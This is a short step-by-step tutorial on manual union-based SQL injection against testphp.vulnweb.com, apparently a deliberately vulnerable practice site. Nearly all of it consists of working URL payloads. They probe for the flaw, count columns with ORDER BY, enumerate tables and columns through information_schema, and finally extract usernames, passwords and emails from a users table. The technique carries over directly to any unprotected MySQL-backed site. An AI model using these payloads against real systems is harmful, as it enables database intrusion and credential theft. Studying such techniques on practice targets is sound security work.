SQLi Steps

I would recommend against Havij since it cannot help you to detect several cases, and make you think that you are safe while you aren't. Learn how to exploit it manually. The example sent is MySQL with no protection at all (the simplest attack method).

1. Hackable point
http://testphp.vulnweb.com/artists.php?artist=1

2. Test the vulnerability
http://testphp.vulnweb.com/artists.php?artist=1%20and%201=0--+ (shall not load)
http://testphp.vulnweb.com/artists.php?artist=1%20and%201=1--+ (shall load)

3. Find how many columns there are on current table
http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%2010--+ (error, then less than 10)
http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%205--+ (error, then less than 5)
http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%203--+ (loaded, then 3 or more)
http://testphp.vulnweb.com/artists.php?artist=1%20order%20by%204--+ (error, then less than 4, so... 3 columns)

4. Find how many columns are selected on current query:
http://testphp.vulnweb.com/artists.php?artist=-1%20union%20all%20select%201,2,3--+ (loaded, so 3, just like the previous step)

5. Get all tables from current db
http://testphp.vulnweb.com/artists.php?artist=-1%20union%20all%20select%201,group_concat(table_name),concat(version(),0x3a,database())%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--+ (we found 'users', an interesting table)

6. Get all columns from interesting table "users"
http://testphp.vulnweb.com/artists.php?artist=-1%20union%20all%20select%201,group_concat(column_name),concat(version(),0x3a,database())%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27%20limit%200,1--+

7. Select the desired info
http://testphp.vulnweb.com/artists.php?artist=-1%20union%20all%20select%201,concat(uname,0x3a,pass,0x3a,email),concat(database(),0x3c3d3e,user(),0x3c3d3e,version())%20from%20users%20limit%200,1--+